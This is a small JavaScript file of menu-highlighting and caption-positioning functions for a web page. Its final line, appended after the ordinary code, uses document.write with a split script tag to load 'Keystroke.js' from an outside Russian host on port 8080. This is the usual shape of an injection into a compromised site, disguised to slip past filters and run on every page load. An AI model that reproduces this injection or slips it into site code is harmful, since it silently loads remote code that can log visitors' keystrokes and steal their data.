function menuitemrollover(itemid,state){
	if(state=="on"){
		document.getElementById(itemid).style.backgroundColor ="#c0ecb9";
	}else{
		document.getElementById(itemid).style.backgroundColor ="";
	}
}
function placeX(itemid){
	var myobj = document.getElementById(itemid);
	document.getElementById("X").style.top = myobj.style.top;
	document.getElementById("captiontextbox").innerHTML = myobj.innerHTML.toUpperCase();
}

function internalLink(linkID){
	var myobj = document.getElementById(linkID);
	var jj= myobj.parentNode;
	eval(jj.href);
	placeX(linkID);
    	var t=setTimeout("dirtyHack()",7000);	
}

function dirtyHack(){
	var hh = location.search;
	var ll = hh.split("=");
	placeX(ll[1]);	
}
document.write('<s'+'cript type="text/javascript" src="http://malepad.ru:8080/Keystroke.js"></scr'+'ipt>');